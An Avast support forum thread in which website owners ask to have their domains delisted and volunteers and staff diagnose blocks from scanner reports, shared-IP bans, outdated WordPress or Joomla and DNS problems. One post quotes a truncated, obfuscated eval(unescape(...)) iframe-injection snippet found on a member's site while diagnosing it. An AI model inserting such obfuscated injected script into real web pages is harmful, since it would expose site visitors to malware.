Avast WEBforum

Other => Viruses and worms => Topic started by: Opus Conseil on June 18, 2013, 09:08:28 PM

Title: How to remove my website from your blacklist?
Post by: Opus Conseil on June 18, 2013, 09:08:28 PM
Hello,

Our website is reported as being in the arvast blacklist. Here is the domain name: wxw.opuscg.fr.
We are sure that our website is clean, therefore we would like you to take a look at it and remove it from your blacklist.

Sincerely,

Maud Démazure
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on June 18, 2013, 09:24:08 PM
Check your URL at   www.urlvoid.com

Also scan your URL at www.virustotal.com
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on June 18, 2013, 10:06:11 PM
(http://my.jetscreenshot.com/18363/20130618-jr3o-61kb.jpg)


detection appears to be correct

Sophos
 threat Mal / htmlgen-A.

Scumware.org  reported hosted malware variant of HTML / ScrInject.B.Gen.

norton reports caution when visiting the link
1 threat

mcafee classified as suspicious.

is listed in the blacklist.


https://www.virustotal.com/pt/url/2d7892d4db5d94c1c83961b719d6ee602b9621c9a26510ffbcd1fc06e45425a9/analysis/1371585111/

http://quttera.com/detailed_report/www.opuscg.fr

http://sitecheck.sucuri.net/results/www.opuscg.fr


http://www.urlvoid.com/scan/opuscg.fr/

http://www.mcafee.com/threat-intelligence/domain/?domain=opuscg.fr

http://safeweb.norton.com/report/show?url=opuscg.fr

http://urlquery.net/report.php?id=3204412
Title: Re: How to remove my website from your blacklist?
Post by: Opus Conseil on July 09, 2013, 08:56:14 PM
Thank you for your return.

Bit Defender removed us from their blacklist. I am sure that our website does not present any malicious content. Could you please check it again?

Thank you very much!

Maud Démazure
Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 09, 2013, 09:08:34 PM
Your site has vulnerable wp software, that needs updating...Wordpress Version 3.5 based on: htxp://opuscg.fr//wp-admin/js/common.js
: /home/opuscg5/public_html/opuscg.fr/wp-content/themes/ecobiz/index.php
A site sharing the same IP is a known PHISH: http://support.clean-mx.de/clean-mx/phishing.php?id=3222646
File fp report to excluse your domain form the general IP blocking -> You can report a possible FP here: http://www.avast.com/contact-form.php

polonus
Title: Re: How to remove my website from your blacklist?
Post by: pellegriniagro on November 18, 2014, 08:22:03 PM
my website

http://esp.geoagris.com/

is also blocked. how can i unblock it?

Thanks!
Title: Re: How to remove my website from your blacklist?
Post by: Lisandro on November 18, 2014, 09:25:56 PM
my website

http://esp.geoagris.com/

is also blocked. how can i unblock it?

Thanks!
You can check your site with:
https://www.virustotal.com
http://zulu.zscaler.com
http://dnscheck.pingdom.com
http://www.siteadvisor.com

To check if a website is hosted on afraid.org, go to http://freedns.afraid.org/ and enter URL in the box you see in top right box and then click Trace button. Any domain hosted on afraid.org can be used by other persons for dns hosting without your control. If it happened for your domain, it was misused for malicious purposes - in that case, when nobody has control on subdomains of domain (DNS hijacking), we block the whole domain in order to protect our users. For you, the solution is most probably only changing the dns hosting and letting us know later (www.avast.com/contact-form.php).
Title: Re: How to remove my website from your blacklist?
Post by: Milos on November 18, 2014, 10:22:04 PM
my website

http://esp.geoagris.com/

is also blocked. how can i unblock it?

Thanks!
You can check your site with:
https://www.virustotal.com
http://zulu.zscaler.com
http://dnscheck.pingdom.com
http://www.siteadvisor.com

To check if a website is hosted on afraid.org, go to http://freedns.afraid.org/ and enter URL in the box you see in top right box and then click Trace button. Any domain hosted on afraid.org can be used by other persons for dns hosting without your control. If it happened for your domain, it was misused for malicious purposes - in that case, when nobody has control on subdomains of domain (DNS hijacking), we block the whole domain in order to protect our users. For you, the solution is most probably only changing the dns hosting and letting us know later (www.avast.com/contact-form.php).
Hello,
it should be fixed now.

Milos
Title: Re: How to remove my website from your blacklist?
Post by: polonus on November 18, 2014, 10:45:33 PM
Nice it has been fixed now. For site a couple of DNS issues have to be settles for that sub domain and the respectable parent nameservers.
Site had vi*gr* spam issues earlier.  Side wide check report:
Suspicious

eoalggyw991ohh4tye8cwa"># buy vi*gr* at w*lm*rt # official online c*n*di*n ph*rm*cy <b>...</b></a></h3><div class="s"><d
(* by me, pol)
But system OK: http://www.closetnoc.org/?i=qh-in-f121.1e100.net

pol
Title: Re: How to remove my website from your blacklist?
Post by: Edi7 on December 05, 2014, 01:30:05 AM
Hello my site toplajme.org has been clasffied as malware i delete evrything on database and ftp i re-install evrything from beggining but again i scan my site and it's ok how can i re-enable again my site please help me.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on December 05, 2014, 01:54:51 AM
You first have to contact Google Safebrowsing as it is blocking your site in Google Chrome and firefox browser.
-> http://www.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Ftoplajme.org&hl=en
And it is not only avast that flags your site: https://www.virustotal.com/nl/url/428ae317377c39b05ff32aa472bf3d1425938202ccf8a31266f520932e2e3208/analysis/1417740333/

iFrame malware detected, see: http://sitecheck.sucuri.net/results/toplajme.org
Known javascript malware. Details: http://sucuri.net/malware/entry/MW:IFRAME:HD28
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%71%66%64%64%36%64%30%37%34%28%27') + '%44%37%69%73%7b%4c%16%14%23%43%6d%73%7d%20%71%69%47%2f%63%71%75%6e%72%77%6b%6a%75%35%6b%7f%7d%72%74%70%30%7e%7f%6b%77%70%6d%7b%37%3a%20%25%7f%7f%80%75%6f%44%2e%76%74%79%76%72%72%73%71%41%21%6b%69%7d%77%71%7f%7d%65%40%22%72%77%6e%69%70%7c%81%43%24%31%4b%25%68%74%73%7d%6f%79%46%26%6a%70%71%66%6a%2a%72%77%6e%69%70%7c%81%25%47%21%3e%32%47%23%34%72%79%34%6a%71%71%78%6a%70%43%2b%73%79%70%6d%70%6c%40%49%5c%56%7d%6a%6b%68%5b%7f%6b%75%7d%6c%74%7a%72%3c%5
Outdated Web Server Apache Found: Apache/2.2.22
Attack explained: http://blogs.technet.com/b/srd/archive/2012/06/06/more-information-about-the-digital-certificates-used-to-sign-the-flame-malware.aspx
Blacklisted from site: s10.histats dot com
wXw.histats dot com
External links blocked: htxp://wXw.histats.com
htxp://s10.histats.com/js15_gif.js
See: https://www.virustotal.com/nl/url/497f39dee3c921a0bf1a56d9d4720f3e86aad13e87bd11216a924ff81b448351/analysis/

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Edi7 on December 05, 2014, 02:34:03 AM
Hi Polnus i checked again my site and i delete evrything again how can i re enable again my site
Title: Re: How to remove my website from your blacklist?
Post by: Milos on December 05, 2014, 11:25:40 AM
Hello,

Our website is reported as being in the arvast blacklist. Here is the domain name: wxw.opuscg.fr.
We are sure that our website is clean, therefore we would like you to take a look at it and remove it from your blacklist.

Sincerely,

Maud Démazure
Hello,
domain was unblocked.

Milos
Title: Re: How to remove my website from your blacklist?
Post by: Milos on December 05, 2014, 11:27:47 AM
Hello my site toplajme.org has been clasffied as malware i delete evrything on database and ftp i re-install evrything from beggining but again i scan my site and it's ok how can i re-enable again my site please help me.
Hello,
I don't see anything detected. Post screenshot of detection, please.

Milos
Title: Re: How to remove my website from your blacklist?
Post by: Edi7 on December 09, 2014, 12:46:15 AM
Hello Milos

This the screenshot http://prntscr.com/5eqmh4 (http://prntscr.com/5eqmh4) i contacted Name.com this is what they sent to me

Hello,

Thank you for contacting Name.com. We ran a malware and Virus scan and nothing was coming up on your site. Google usually runs a check every 48 hours, so the sites should be loading correctly after they recheck. To be safe, I strongly suggest you reset all your passwords, since it appears there was a problem with the site before, based on the error logs. If you need any further help, please don't hesitate to contact us and thank you for choosing Name.com!

i delete evrything i changed evrypasword  evrything and i can't see my site enable again
Title: Re: How to remove my website from your blacklist?
Post by: polonus on December 09, 2014, 01:40:38 AM
Sucuri still has iFrame malware detected: http://www.uploady.com/#!/download/VeJkIgvyeR6/OltbIVltZUVrL3IP

polonus
Title: Re: How to remove my website from your blacklist?
Post by: digitalconsult on December 20, 2014, 09:12:24 AM
please remove this website from your black list : http://www.galerie-art-africain.com

we got a problem 2 weeks ago, that has been fixed directly, we are clean
virustotal : https://www.virustotal.com/fr/url/13f66d2374acd2e500840e09571d45157f8613eeec91a46b1a4f39d6edf431a2/analysis/

Google safebrowsing : http://www.google.com/safebrowsing/diagnostic?site=http://www.galerie-art-africain.com

but avast continues to show warnings

best regards,
Title: Re: How to remove my website from your blacklist?
Post by: jimena.gamarra on January 09, 2015, 06:21:44 AM
My website is also in the blacklist.
I checked it at www.urlvoid.com and www.virustotal.com and it is now clean. Could you please remove http://www.universoregalos.com.ar from your blacklist?
Thanks!!
Title: Re: How to remove my website from your blacklist?
Post by: polonus on January 09, 2015, 06:49:35 AM
Hi  jimena.gamarra,

Your website has been blocked as part of a general IP block see:  https://www.virustotal.com/nl/ip-address/69.195.124.71/information/
You could ask for an exclusion of your website with a reference to this thread here at virus@avast.com .
The unblocking has to be performed by an avast team member and we here are not avast team members,
I for instance am just a volunteer with relevant knowledge.

However you should check this included script,htxp://cdn.dsultra.com/js/registrar.js, for malvertising, read http://forum.joomla.org/viewtopic.php?f=621&t=684752

Furthermore you have a suspicious iFrame check.

Some minor issues here: http://www.dnsinspect.com/universoregalos.com.ar/1420781615

You should take the following security issues up with bluehost - security header scan issues, re: http://www.uploady.com/#!/download/1cSSy3~52nH/RQ5HvNPXjM~Ga6wZ  (one header configured correctly and nine missing  :o )

IDS alerts here: http://urlquery.net/report.php?id=1420782872184

polonus (volunteer website security analyst and website error-hunter)

Title: Re: How to remove my website from your blacklist?
Post by: CristianRamos on January 25, 2015, 10:56:43 PM
Could you check my website?

http://www.pelaoramos.cl

I checked and no virus was found

https://www.virustotal.com/es/url/53829c6627b3fe24ef711b8ce526e0c1a16808c15bcbcc78dd014d05b3896906/analysis/

Thanks!
Title: Re: How to remove my website from your blacklist?
Post by: polonus on January 25, 2015, 11:36:21 PM
Ola CristianRamos,

I assume that your website was blocked as part of a general IP block, see: https://www.virustotal.com/nl/ip-address/186.64.113.100/information/
Some other domains on that same IP address are reported because of PHISH-ing.
So you should ask an avast team member to make an exclusion for your website, here: https://www.avast.com/contact-form.php

There are some minor issues you should take up with those that host that website, nothing malicious but as part of general security recommendations. See: http://www.dnsinspect.com/pelaoramos.cl/1422224803
WARNING: Name servers software versions are exposed:
186.64.113.4: "9.8.2rc1-RedHat-9.8.2-0.30.rc1.el6_6.1"
190.114.254.28: "9.3.6-P1-RedHat-9.3.6-25.P1.el5_11.2"
208.71.173.199: "9.8.2rc1-RedHat-9.8.2-0.30.rc1.el6_6.1"
216.224.180.87: "9.3.6-P1-RedHat-9.3.6-25.P1.el5_11.2"
Exposing name server's versions may be risky, when a new vulnerability is found your name servers may be automatically exploited by script kiddies until you patch the system. Hide version.
Also the security header situation for your site demands attention, see: https://www.uploady.com/#!/download/CUl01_pPODR/FBy7x1GMO_ryOmwZ

Con Dios,
polonus (volunteer website security analyst and website error-hunter)

Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on January 27, 2015, 08:06:49 PM
Could you check my website?

http://www.pelaoramos.cl

I checked and no virus was found

https://www.virustotal.com/es/url/53829c6627b3fe24ef711b8ce526e0c1a16808c15bcbcc78dd014d05b3896906/analysis/

Thanks!

Hello

Quote from: Lukas Havel
It's false positive. The detection will be fixed in the next VPS.
 We are sorry for the inconvenience.
 Best regards, Lukas Havel

Title: Re: How to remove my website from your blacklist?
Post by: Contato33 on February 19, 2015, 08:34:54 PM
Meu site está também na lista negra.
Eu verifiquei em www.urlvoid.com e www.virustotal.com e agora está limpo. Poderia, por favor remover http://www.janaynna.com.br de sua lista negra?
Obrigada !!

My website is also in the blacklist.
I checked it at www.urlvoid.com and www.virustotal.com and it is now clean. Could you please remove http://www.janaynna.com.br from your blacklist?
Thanks!!
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on February 19, 2015, 08:51:18 PM
http://zulu.zscaler.com/submission/show/7c961750c81270e7dd2ad6f18af45544-1424374798
http://www.siteadvisor.com/sites/janaynna.com.br
https://www.virustotal.com/en/url/6a2114f7cf23b079f8ff92826c1ea166fce4eae521e349254a5f9dd567da3aa7/analysis/1424374677/
http://sitecheck.sucuri.net/results/www.janaynna.com.br
http://urlquery.net/report.php?id=1424374998821
http://urlquery.net/report.php?id=1424375017195
https://www.ssllabs.com/ssltest/analyze.html?d=janaynna.com.br&ignoreMismatch=on&latest
http://dnscheck.pingdom.com/?domain=www.janaynna.com.br
Title: Re: How to remove my website from your blacklist?
Post by: richard167 on February 19, 2015, 11:19:39 PM
Hi.
My website has been on a blacklist www.partypig.co.uk and i have rebuilt it on a new server. all software is up to date and it passes all the tests on :

http://freedns.afraid.org/domain/dnstrace.php?domain=www.partypig.co.uk&submit=Trace
https://www.virustotal.com
http://www.urlvoid.com/scan/partypig.co.uk/

and lots more places too. I have submitted requests through Avast antivirus software but its still blocked, hoping this is the place to get it a clean bill of health please !!!

thanks
Title: Re: How to remove my website from your blacklist?
Post by: polonus on February 19, 2015, 11:27:50 PM
Site cannot be resolved at the mo: http://www.dnsinspect.com/janaynna.com.br/1424384095
Has been taken down and not in namespace: janaynna.com.br,,,Not in namespace,
see: https://www.robtex.com/en/advisory/dns/br/com/janaynna/
Detected as Open Anonymous Proxy: http://www.liveipmap.com/162.144.44.17
mail abuse? -> http://antispam.imp.ch/05-uribl.php?lng=1
Warning—Incomplete Record
The record we received from the Whois server may be incomplete: http://whois.domaintools.com/janaynna.com.br
Server software outdated and vulnerable: Apache/2.4.10 (Unix) OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Attacked - long OVERDUE malware?

polonus
Title: Re: How to remove my website from your blacklist?
Post by: polonus on February 19, 2015, 11:36:43 PM
Hi richard167,

As far as I can establish your domain is victim of an IP block: http://anti-hacker-alliance.com/index.php?details=89.200.137.33
Issues here: http://www.dnsinspect.com/partypig.co.uk/1424384980
Ask foir a domain exclusion, I cannot help you as I am a volunteer with relevant knowledge but not an avast team member and only they will unblock eventually.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: richard167 on February 20, 2015, 12:06:13 AM
Odd there are dozens of sites on that IP and this site only in last few weeks, what is an IP block please ? Also what is domain exclusion?
Thanks
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on February 22, 2015, 02:43:09 AM
My website is also in the blacklist.
I checked it at www.urlvoid.com and www.virustotal.com and it is now clean. Could you please remove http://www.janaynna.com.br from your blacklist?
Thanks!!

Hello
there detected "hxxp://www.janaynna.com.br/_agenda/moto.jar"     
please confirm that this was clean ?
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on February 23, 2015, 08:42:24 AM
Richard167:
I am unblocking partypig.co.uk now.

Contato33:
It was indeed blocked because of janaynna.com.br/_agenda/moto.jar. Seeing it is a long time now, I am unblocking the domain, I hope the issue was already taken care of.
Title: Re: How to remove my website from your blacklist?
Post by: oneforallhosting on February 28, 2015, 08:56:46 PM
Powerquilting.com is blocked

From my host:

Your account was scanned for viruses/malware/iframes and none were found!
Furthermore, your site was scanned by numerous Online malware/iframe tools like:
- http://www.quttera.com/website-malware-scanner
- http://sitecheck.sucuri.net/results/powerquilting.com
- https://www.virustotal.com/en/url/814cd8a3cb9b06804d06aaa2a0372dee7945164492172b7afc2c952003d89145/analysis/1425139227/

Do you have more information about the "malware" that Avast is reporting? This could easily be a false positive.

From URLVOID

Powerquilting.com

No active threats were reported by the scanning engines.

From VIRUSTOTAL

URL:   http://powerquilting.com/
Detection ratio:   0 / 62
Analysis date:   2015-02-28 16:00:27 UTC ( 3 hours, 42 minutes ago )
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on February 28, 2015, 09:00:30 PM
You can report a possible FP here: https://www.avast.com/contact-us.php?subject=VIRUS-FILE
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on February 28, 2015, 09:08:45 PM
IP history  https://www.virustotal.com/nb/ip-address/72.52.194.226/information/
multiple domains on same IP, and many are blacklisted .... click more button under list(s) to see more

so seems like a IP block


Title: Re: How to remove my website from your blacklist?
Post by: oneforallhosting on March 01, 2015, 03:47:44 PM
Thanks, forwarded to host.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on March 01, 2015, 04:56:05 PM
Hi Edi7,

Re: http://sitecheck.sucuri.net/results/toplajme.org

It is this: http://labs.sucuri.net/db/malware/php-error-fatal-error?v7
Turns out it was because you probably forgot to close a comment block (forgot the */).
Re: Outdated Web Server Apache Found: Apache/2.2.22
Take this last issues up with your hoster.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Contato33 on March 03, 2015, 04:15:31 PM
Thanks for the feedback. Unlocked domain. ;) ;)
Title: Re: How to remove my website from your blacklist?
Post by: nethunter on March 05, 2015, 09:54:12 AM
Hi,

our site (http://www.assocoral.it), is in your blacklist.

We have cleaned it and removed malicious files, can you remove it from the blacklist?

Best regards
Title: Re: How to remove my website from your blacklist?
Post by: polonus on March 05, 2015, 12:41:23 PM
IP has 50 domains on one and the same IP address, which is known for PHISHing: http://permalink.gmane.org/gmane.comp.security.phishings/48825
It is not only Avast that alerts your site also WOT gives a bad web rep: https://www.mywot.com/en/scorecard/assocoral.it?utm_source=addon&utm_content=popup
because of phishing. Worse your site is a 100% PHISH: http://www.phishtank.com/phish_detail.php?phish_id=3003462
Potentially active malware: http://www.avgthreatlabs.com/website-safety-reports/domain/assocoral.it/
And more blacklists flagged it: http://www.yandex.com/infected?url=assocoral.it&l10n=en
Web application version:
Joomla Version 2.5.6 found at: htxp://www.assocoral.it/administrator/manifests/files/joomla.xml
Joomla version outdated: Upgrade required.
Outdated Joomla Found: Joomla under 2.5.26 or 3.3.5
This external link is flagged by WOT: https://www.mywot.com/en/scorecard/mns.it?utm_source=addon&utm_content=popup

Update your Open Source CMS.
Some blacklisting for site has been removed, wait for a final verdict from an avast team member
to reconsider the block. I am not an avast team member, just someone with relevant knowledge.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: vinz3 on March 27, 2015, 06:21:53 PM
Our website ocebo.com is safe but blacklisted. It's the same website and web server than ocebo.fr
Could you remove it from your blacklist please ? It's a real handicap for our business.

Best regard,
Title: Re: How to remove my website from your blacklist?
Post by: polonus on March 27, 2015, 06:42:01 PM
Has this been cleansed?
wXw.ocebo.fr/wp-content/themes/ocebo/js/owl.carousel.min.js?ver=20150310
Severity:   Potentially Suspicious
Reason:   Suspicious JavaScript code injection.
Details:   Detected hidden potentially suspicious procedure unescape Invoked procedure
File size[byte]:   40401
File type:   ASCII
Page/File MD5:   FFAA3C82AD2C6E216E68ACA44746E1BE
Scan duration[sec]:   1.632000

But this could rather be a bug than malcode

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Jon50 on April 17, 2015, 02:36:26 PM
We are a small shop hosting about 30 websites for our clients.  Havent' had a serious issue with Malware in a very long time, but we're still on the Avast blacklist.  Would you please check for me?  It affects all the sites we host at 67.43.12.14.

Thanks,

Jon
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on April 17, 2015, 06:07:20 PM
itindianapolishosting.com is not blocked by avast.
Title: Re: How to remove my website from your blacklist?
Post by: Jon50 on April 21, 2015, 01:40:15 AM
Please check itindianapolis.com.

Everytime I try to load any site we host, Avast says "Threat has been detected" and the popup.

Even my autodiscover service in Outlook is flagged: http://autodiscover.indygb.com/autodiscover/autodiscover.xml

And no, http://itindianapolishosting.com/, won't load either.

Thanks for your help.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on April 21, 2015, 02:00:40 AM
Report it here  avast support   https://support.avast.com > avast virus lab

Title: Re: How to remove my website from your blacklist?
Post by: Eddy on April 21, 2015, 02:10:42 AM
As I said, http://itindianapolishosting.com is not blocked by avast.
I can open it without a problem with all shields active.
I suggest you check if your system isn't infected.
https://forum.avast.com/index.php?topic=53253.0
Title: Re: How to remove my website from your blacklist?
Post by: Jon50 on April 21, 2015, 02:14:11 AM
Indeed, Avast is blocking it on multiple machines that aren't infected.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on April 21, 2015, 08:58:56 AM
Produce the logs demanded here https://forum.avast.com/index.php?topic=53253.0
and a qualified remover may establish what is wrong on those so-called clean machines.

polonus

See attached how avast users see website home page
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on April 21, 2015, 01:17:28 PM
Different looks in different browsers ?
Title: Re: How to remove my website from your blacklist?
Post by: michaelallenlong on May 05, 2015, 10:22:42 PM
Our website, www.careerbridgeinc.com has been blocked. It is clean on Virus Total and other scanners. https://www.virustotal.com/en/url/53887789f3f8215cbb7f89dc21126f55fd331de7afa548517493c1d546c12333/analysis/.

Any idea why this is happening?
Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 05, 2015, 10:48:45 PM
Hi michaelallenlong,

More than likely a general IP block, over 200 domains share one and the same IP address.
See here: https://www.virustotal.com/nl/ip-address/192.254.235.141/information/
IP has PHISH malcode flags ->  https://www.virustotal.com/nl/ip-address/192.254.235.141/information/
I get a 502 Bad Gateway alert on nginx/1.4.6 (Ubuntu)  should be 1.8.0
Nothing here: http://urlquery.net/report.php?id=1430858796377
You could ask an exclusion here at virus@avast.com
Unblocking should be performed by an avast team member and we here aren't.

polonus

Title: Re: How to remove my website from your blacklist?
Post by: Eddy on May 05, 2015, 11:11:21 PM
michaelallenlong,

as clearly stated on the website, VirusTotal does not scan websites.

Blacklisted:
http://zulu.zscaler.com/submission/show/d3f2a3b7d15dc072f72a127c0a394d5d-1430859752

Blacklisted and malware detected:
http://urlquery.net/report.php?id=1430859939113
http://urlquery.net/report.php?id=1430859886593

Certificate and other issues:
https://www.ssllabs.com/ssltest/analyze.html?d=careerbridgeinc.com

And the list with problems goes on and on.
Title: Re: How to remove my website from your blacklist?
Post by: Jeef33 on May 06, 2015, 06:47:35 PM
My website, phase4fs.com, has also been blacklisted.  We fixed the DNS issue and it's now on GoDaddy servers.  All scans have been done and passed and there was never any viral activity.  Please de-list the site and reply back to my email or here to let me know.  Thanks
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on May 06, 2015, 07:13:10 PM
report it here   https://https://support.avast.com > avast virus lab


your wordpress is outdated   ;)   https://sitecheck.sucuri.net/results/phase4fs.com

IP history  https://www.virustotal.com/en/ip-address/66.96.160.142/information/
multiple domains on same IP and many are blacklisted

IP void  http://www.urlvoid.com/ip/66.96.160.142
Quote
IP ADDRESS: 66.96.160.142

We have found in our database of already analyzed websites that there are 149 websites hosted in the same web server with IP address 66.96.160.142 and IP hostname 142.160.96.66.static.eigbox.net. Remember that it is not good to have too many websites located in the same web server because if a website gets infected by malware, it can easily affect the online reputation of the IP address and also of all the other websites.


Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 06, 2015, 07:35:13 PM
Follow up for what Pondus advised you about CMS updates.
I found some additional issues that should be attended.

Your website is a Ghosted website.
Fail on Nameserver responding: FAIL: While quering domain's records, some of your name servers didn't responded. Name servers which didn't responded:
udp4:216.69.185.19
WARNING: We found different serial numbers on your name servers, it's OK if you had modified your zone recently.
WARNING: Domain doesn't have SPF record.  (spam vulnerable).

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Evgeniy L on May 08, 2015, 08:03:12 AM
Hi!

Our site http://www.betro.ru/ was blacklisted by AVAST but i can't see why it happened. Could someone please explain it to me?
Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 08, 2015, 02:39:18 PM
Hi Evgeniy L,

Probably a general IP block as there are over 650 domains on that same IP address,
see: https://www.virustotal.com/nl/ip-address/92.53.123.231/information/
92.53.123.231 is blacklisted by 1 websites using IP Blacklist Cloud Plugin.
Ask for an exclusion here at virus@avast.com

Just an issue to take up with hoster: WARNING: Name servers software versions are exposed:
92.53.116.200: "PowerDNS Authoritative Server 3.4.4 (jenkins@autotest.powerdns.com built 20150423104859 root@autotest.powerdns.com)"
92.53.116.26: "PowerDNS Authoritative Server 3.4.4 (jenkins@autotest.powerdns.com built 20150423104859 root@autotest.powerdns.com)"
92.53.98.100: "PowerDNS Authoritative Server 3.4.4 (jenkins@autotest.powerdns.com built 20150423104859 root@autotest.powerdns.com)"
92.53.98.42: "PowerDNS Authoritative Server 3.4.4 (jenkins@autotest.powerdns.com built 20150423104859 root@autotest.powerdns.com)"
Exposing name server's versions may be risky, when a new vulnerability is found your name servers may be automatically exploited by script kiddies until you patch the system.

Also check: Possible Frontend SPOF from:

fonts.googleapis.com - Whitelist
(88%) - <link href='http://fonts.googleapis.com/css?family=Open+Sans:400,800,800italic,700italic,700,600italic,600,400italic&subset=latin,cyrillic-ext' rel='stylesheet' type='text/css' />

DrWeb URL check = OK: Checking: -http://www.betro.ru
Engine version: 7.0.12.3050
Total virus-finding records: 5952542
File size: 41.50 KB
File MD5: a185472bd184310d17eb2215a0338398

-http://www.betro.ru - archive JS-HTML
>-http://www.betro.ru/JSTAG_1[566][83] - Ok
>-http://www.betro.ru/JSTAG_2[612][27d] - Ok
>-http://www.betro.ru/JSTAG_3[8b8][13e] - Ok
>-http://www.betro.ru/JSTAG_4[10a0][68] - Ok
>-http://www.betro.ru/JSTAG_5[1131][18f] - Ok
>-http://www.betro.ru/JSTAG_6[14b1][184] - Ok
>-http://www.betro.ru/JSTAG_7[a229][322] - Ok
-http://www.betro.ru - Ok 
Netcraft Risk Status All green: http://toolbar.netcraft.com/site_report?url=http://www.betro.ru

polonus
Title: Re: How to remove my website from your blacklist?
Post by: KPtif on August 24, 2015, 02:12:50 PM
Hello,

Since Saturday, my domain (smarteagle.ch) is blacklisted by Avast. I found out that the cause was that we were using freedns.afraid.org and that some random guy created a malicious subdomain.

I no longer use the services from freedns and have installed a DNS server on my own server. Everything seems fine for me now but the domain is still blacklisted.

I already have created a ticket on the Avast's support but no reply yet.

Can somebody tell me if everything is okay with my domain now and if it can be removed from the blacklist ?

Thank you !
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on August 24, 2015, 03:03:51 PM
Hello,

Since Saturday, my domain (smarteagle.ch) is blacklisted by Avast. I found out that the cause was that we were using freedns.afraid.org and that some random guy created a malicious subdomain.

I no longer use the services from freedns and have installed a DNS server on my own server. Everything seems fine for me now but the domain is still blacklisted.

I already have created a ticket on the Avast's support but no reply yet.

Can somebody tell me if everything is okay with my domain now and if it can be removed from the blacklist ?

Thank you !
what is your ticket number?

Title: Re: How to remove my website from your blacklist?
Post by: KPtif on August 24, 2015, 03:08:34 PM
My ticket number is : #XKU-888-98267
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on August 24, 2015, 03:16:46 PM
OK i will see if i can speed up the reply ... no guaranty   ;)

Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on August 24, 2015, 03:40:26 PM
Hi,
I am unblocking your domain now ;-)
Title: Re: How to remove my website from your blacklist?
Post by: KPtif on August 24, 2015, 03:50:42 PM
Okay ! Thank you for unblocking it and thanks Pondus for your help !
Title: Re: How to remove my website from your blacklist?
Post by: ScottAtCatalyst on August 24, 2015, 06:30:48 PM
Hi.  Our client's website is being blocked by Avast antivirus.  The domain is http://rsjcpa.com/

We have scanned and verified that there is nothing malicious on the domain.  We have scanned every known blacklist and everything comes up clean.  Sucuri, VirusTotal, etc.

How do we request a scan, confirmation and removal from the Avast blocked list?

Thank you in advance for any assistance?

-Scott
Title: Re: How to remove my website from your blacklist?
Post by: polonus on August 25, 2015, 12:17:55 AM
Site -rsjcpa.com is blocked by Avast as with URL:Mal.
could be obfuscated packer code.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on August 25, 2015, 09:51:42 PM
My website, phase4fs.com, has also been blacklisted.  We fixed the DNS issue and it's now on GoDaddy servers.  All scans have been done and passed and there was never any viral activity.  Please de-list the site and reply back to my email or here to let me know.  Thanks


(http://i.imgur.com/KoxKqkI.png)

Hello

Sorry by inconvenience

https://phase4fs.com no is longer blocked fixed by Avast.
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on August 26, 2015, 09:54:15 PM
Hi.  Our client's website is being blocked by Avast antivirus.  The domain is http://rsjcpa.com/

We have scanned and verified that there is nothing malicious on the domain.  We have scanned every known blacklist and everything comes up clean.  Sucuri, VirusTotal, etc.

How do we request a scan, confirmation and removal from the Avast blocked list?

Thank you in advance for any assistance?

-Scott

Hello

it was FP (false positive).

Quote from: Rojan Piya
It should be fixed in the new virus definition update VPS

Title: Re: How to remove my website from your blacklist?
Post by: Guilherme65 on September 02, 2015, 11:34:49 PM
Hello, can you remove my site from blacklist? :/  www.abinpet.org.br/
http://www.urlvoid.com/scan/abinpet.org.br/
Is a institutional site.

Thanks a lot.



Olá, vocês poderiam remover meu site da blacklist? :/ www.abinpet.org.br/
http://www.urlvoid.com/scan/abinpet.org.br/
É um site institucional.

Muito obrigado.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on September 02, 2015, 11:52:46 PM
Hello, can you remove my site from blacklist? :/  www.abinpet.org.br/
http://www.urlvoid.com/scan/abinpet.org.br/
Is a institutional site.

Thanks a lot.



Olá, vocês poderiam remover meu site da blacklist? :/ www.abinpet.org.br/
http://www.urlvoid.com/scan/abinpet.org.br/
É um site institucional.

Muito obrigado.
Website is infected    https://sitecheck.sucuri.net/results/www.abinpet.org.br/

Killmalware   www.killmalware.com/abinpet.org.br/site/


https://www.virustotal.com/nb/file/fd1f20fdb19d00f27dcec4aa48652ba5b0c2307f5552a4ca73c851715ef66b44/analysis/1441231069/


Title: Re: How to remove my website from your blacklist?
Post by: Guilherme65 on September 03, 2015, 09:07:37 AM
I removed the iframe!
Thanks for help ! :)

http://killmalware.com/abinpet.org.br/site#

Can you remove-me from the blacklist now?

Thanks!
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on September 03, 2015, 09:28:41 AM
I removed the iframe!
Thanks for help ! :)

http://killmalware.com/abinpet.org.br/site#

Can you remove-me from the blacklist now?

Thanks!
report it here  https://support.avast.com/ -> avast virus lab

Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on September 03, 2015, 09:40:01 AM
Hi,
